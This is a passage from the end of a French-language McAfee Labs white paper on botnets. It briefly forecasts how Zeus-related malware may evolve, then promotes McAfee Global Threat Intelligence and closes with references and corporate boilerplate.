exploiter pleinement les technologies web 2.0. Parmi les autres avancées technologiques escomptées, citons :
• Extension des fonctionnalités et de l'accès à la plupart des navigateurs (en plus de Firefox et
Internet Explorer)
• Intégration encore plus étroite avec les technologies de messagerie instantanée, par exemple
JabberZeuS, afin d'accéder plus rapidement aux données bancaires et autres
• Meilleure intégration avec d'autres logiciels malveillants, notamment Bredolad et Pushdo,
pour accroître la prévalence mondiale sur les systèmes
13Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère
Une nouvelle arme : McAfee Global Threat Intelligence
Compte tenu de la croissance exponentielle des cybermenaces et de leur sophistication accrue, les
professionnels de la sécurité doivent adopter une approche différente pour détecter et contrer les attaques.
Par le passé, une stratégie de défense en profondeur, à savoir une protection multiniveau, suffisait.
En revanche, il est nécessaire aujourd'hui de pouvoir exploiter des informations corrélées sur les menaces
recueillies aux quatre coins du globe et pour tous les vecteurs de menaces. Ces renseignements doivent
être communiqués et intégrés à un large éventail de produits de sécurité pour leur permettre de mettre
en œuvre des stratégies locales basées sur les menaces les plus récentes et de partager des informations.
L'objectif est de disposer d'une infrastructure de gestion de la sécurité véritablement unifiée et collaborative.
Avec Global Threat Intelligence, son système mondial de renseignements sur les menaces, McAfee est
passé à l'étape suivante de la défense en profondeur. Ce moteur balaie Internet et collecte les données
sur les menaces relatives aux différents vecteurs avant de mettre ces données en corrélation puis de créer
un modèle exhaustif et d'assurer la protection des entreprises grâce à une suite complète de produits
de sécurité. Nos fonctionnalités dématérialisées opèrent en étroite collaboration avec les mécanismes de
mise en œuvre de stratégies et les moteurs locaux des produits McAfee afin d'offrir la protection la plus
robuste et complète du marché. Nos clients ont tout avantage à installer les produits de sécurité McAfee
car ceux-ci partagent non seulement les renseignements sur les menaces, mais ils les analysent et les
exploitent de façon pertinente et en fonction de leur rôle et de leur emplacement sur le réseau.
Références
• « Progress Made, Trends Observed » (Progrès réalisés et tendances observées), Microsoft Antimalware
Team. http://download.microsoft.com/download/5/6/d/56d20350-afc8-4051-a0df-677b28298912/
msrt%20-%20progress%20made%20lessons%20learned.pdf
• SecureWorks. http://www.secureworks.com/
• Livres blancs techniques de McAfee Labs. http://www.mcafee.com/us/threat_center/white_paper.html
A propos de McAfee Labs™
McAfee Labs est l'équipe de recherche mondiale de McAfee, Inc. Seul organisme de recherche spécialisé
dans tous les vecteurs de menace (logiciels malveillants, vulnérabilités, menaces visant les environnements
web, la messagerie électronique et les réseaux), McAfee Labs collecte des renseignements provenant de ses
millions de sondes et de ses technologies d'évaluation de la réputation dématérialisées telles que McAfee
Artemis™ et McAfee TrustedSource™. L'équipe de 350 chercheurs pluridisciplinaires de McAfee Labs,
présente dans 30 pays, suit l'éventail complet des menaces en temps réel, identifiant les vulnérabilités des
applications, analysant et mettant en corrélation les risques et permettant des corrections instantanées
pour protéger les entreprises et les particuliers.
A propos de McAfee
Basé à Santa Clara en Californie, McAfee, Inc. est la plus grande entreprise au monde entièrement
vouée à la sécurité informatique. McAfee consacre tous ses efforts à trouver des réponses aux plus
grands défis de sécurité de notre époque. A cette fin, notre société fournit des solutions et des
services proactifs réputés assurant la sécurisation des systèmes et des réseaux dans le monde entier.
Les utilisateurs peuvent ainsi se connecter à Internet, surfer et faire des achats en ligne en toute
sécurité. Avec le soutien d'une équipe de recherche saluée par de nombreux prix, McAfee crée des
produits innovants à l'intention des particuliers, des entreprises, du secteur public et des fournisseurs
de services, pour les aider à se conformer aux réglementations, à protéger leurs données, à prévenir les
perturbations dans le flux des activités, à identifier les vulnérabilités ainsi qu'à surveiller et à améliorer
en continu leurs défenses. www.mcafee.com/fr.
Les renseignements contenus dans le présent document ne sont fournis qu'à titre informatif, au bénéfice des clients de McAfee. Les informations
présentées ici peuvent faire l'objet de modifications sans préavis et sont fournies sans garantie ni représentation quant à leur exactitude ou à leur
adéquation à une situation ou à des circonstances spécifiques.
McAfee S.A.S.
Tour Franklin, La Défense 8 McAfee et le logo McAfee sont des marques commerciales déposées ou des marques commerciales de McAfee, Inc. et/ou de ses sociétés affiliées
92042 Paris La Défense Cedex aux Etats-Unis et/ou dans d'autres pays. Les autres noms et marques peuvent être la propriété d'autres sociétés. Les plans, les spécifications et les
France descriptions des produits mentionnés dans le présent document sont donnés à titre indicatif uniquement. Ils peuvent être modifiés sans préavis
+33 1 47 62 56 00 (standard) et sont fournis sans aucune garantie, implicite ou explicite.
www.mcafee.com/fr 10204wp_botnets_0710_ETMGVous pouvez aussi lire
